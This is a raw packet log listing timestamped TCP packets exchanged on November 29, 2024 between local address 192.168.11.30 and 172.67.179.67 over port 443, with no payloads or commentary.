                                                                                                            Nov 29, 2024 09:10:31.718112946 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.718265057 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.718595982 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.718676090 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.718868971 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.718868971 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.718923092 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.719124079 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.719628096 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.719701052 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.719822884 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.719822884 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.719868898 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.719892979 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.719988108 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.720042944 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.720887899 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.720967054 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.721096992 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.721096992 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.721096992 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.721096992 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.721163034 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.721184015 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.721369982 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.721880913 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.721961021 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.722074032 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.722074032 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.722120047 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.722143888 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.722234964 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.722276926 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.722898006 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.722978115 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.723108053 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.723109007 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.723166943 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.723205090 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.723205090 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.723434925 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.723931074 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.724000931 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.724458933 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.724458933 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.724512100 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.724776030 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.724845886 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.724920988 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.725018978 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.725018978 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.725050926 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.725068092 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.725167990 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.725243092 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.725951910 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.726023912 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.726136923 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.726136923 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.726136923 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.726201057 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.726344109 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.726387024 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.727104902 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.727183104 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.727272034 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.727272034 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.727344990 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.727374077 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.727402925 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.727402925 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.727547884 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.727871895 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.727943897 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.728056908 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.728056908 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.728104115 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.728128910 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.728173018 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.728319883 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.729089975 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.729159117 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.729389906 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.729523897 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.729574919 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.729620934 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.730137110 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.730233908 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.730313063 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.730582952 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.730635881 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.730895042 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.731065035 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.731132984 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.731267929 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.731268883 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.731317043 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.731317043 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.731317043 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.731347084 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.731533051 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.732161045 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.732229948 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.732495070 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.732546091 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.732737064 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.733208895 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.733278990 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.733443975 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.733444929 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.733508110 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.733540058 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.733540058 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.733727932 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.734210968 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.734283924 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.734431028 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.734431028 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.734492064 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.734492064 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.734520912 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.734551907 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.734757900 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.735277891 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.735346079 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.735454082 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.735454082 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.735513926 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.735513926 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.735543013 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.735573053 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.735724926 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.736323118 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.736391068 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.736531019 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.736556053 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.736579895 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.736579895 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.736716032 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.737183094 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.737250090 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.737371922 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.737435102 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.737464905 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.737490892 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.737653017 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.738405943 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.738475084 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.738598108 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.738598108 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.738643885 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.738643885 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.738672018 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.738708019 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.738897085 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.739420891 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.739489079 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.739628077 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.739752054 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.739803076 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.739984989 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.740530014 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.740597963 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.740811110 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.740963936 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.741014957 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.741305113 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.741561890 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.741631985 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.741759062 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.742125034 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.742175102 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.742460966 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.742611885 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.742687941 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.742961884 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.743016005 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.743279934 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.743649960 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.743719101 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.743866920 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.743868113 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.743868113 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.743868113 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.743932962 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.744046926 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.744160891 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.744694948 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.744761944 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.744883060 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.744883060 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.744946003 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.744946003 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.744976044 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.745007038 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.745168924 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.745587111 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.745656967 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.745747089 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.745836973 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.745836973 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.745894909 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.745965004 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.746081114 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.746476889 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.746547937 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.746850967 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.746901989 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.747203112 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.747864008 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.747934103 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.748413086 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.748464108 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.748760939 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.748935938 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.749005079 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.749126911 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.749289036 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.749340057 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.749522924 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.749874115 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.749947071 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.750082970 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.750082970 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.750123024 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.750123978 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.750145912 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.750324965 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.910805941 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.910972118 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.911020994 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.911021948 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.911073923 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.911097050 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.911132097 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.911274910 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.911612988 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.911681890 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.911809921 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.911809921 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.911849976 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.911849976 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.911871910 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.911912918 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.912070990 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.912523985 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.912586927 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.912760973 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.912760973 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.912811995 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.912841082 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.912841082 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.912986994 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.913615942 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.913677931 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.913820028 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.913820028 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.913872957 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.913872957 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.913897038 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.913966894 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.914074898 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.914571047 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.914632082 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.914804935 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.914804935 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.914854050 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.914882898 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.915024996 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.915864944 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.915930986 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.916070938 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.916224957 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.916269064 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.916479111 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.916816950 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.916884899 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.917059898 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.917104959 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.917187929 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.917288065 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.917802095 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.917876005 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.918024063 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.918024063 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.918075085 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.918106079 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.918106079 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.918345928 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.918736935 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.918807030 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.919198990 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.919245958 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.919419050 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.919888973 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.919955015 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.920101881 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.920101881 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.920152903 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.920183897 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.920183897 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.920423031 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.920975924 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.921056986 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.921188116 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.921188116 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.921188116 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.921189070 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.921252966 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.921325922 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.921392918 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.922094107 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.922173977 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.922353983 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.922406912 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.922440052 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.922591925 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:31.922929049 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:31.923007965 CET44349761172.67.179.67192.168.11.30
